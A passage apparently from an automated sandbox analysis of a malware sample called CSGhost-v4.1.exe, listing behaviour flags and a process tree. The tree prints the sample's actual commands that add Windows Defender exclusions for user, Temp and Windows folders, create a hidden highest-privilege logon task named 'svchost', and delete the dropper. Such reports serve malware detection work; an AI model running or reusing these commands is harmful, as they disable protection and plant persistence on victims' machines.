110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2128 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
PID 2188 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\system32\cmd.exe
PID 2188 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 2188 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe C:\Windows\System32\cmd.exe
PID 2536 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2536 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2536 wrote to memory of 2452 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2452 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 3040 wrote to memory of 1112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3040 wrote to memory of 1112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3040 wrote to memory of 1112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2452 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2452 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2452 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2452 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 2452 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\svchost64.exe C:\Windows\System32\cmd.exe
PID 1632 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\system32\cmd.exe
PID 1632 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\system32\cmd.exe
PID 1632 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 1088 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 1088 wrote to memory of 2904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\choice.exe
PID 2900 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 1632 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 1632 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\cmd.exe
PID 2160 wrote to memory of 680 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe
PID 2160 wrote to memory of 680 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost64.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe

"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"

C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\system32\cmd.exe

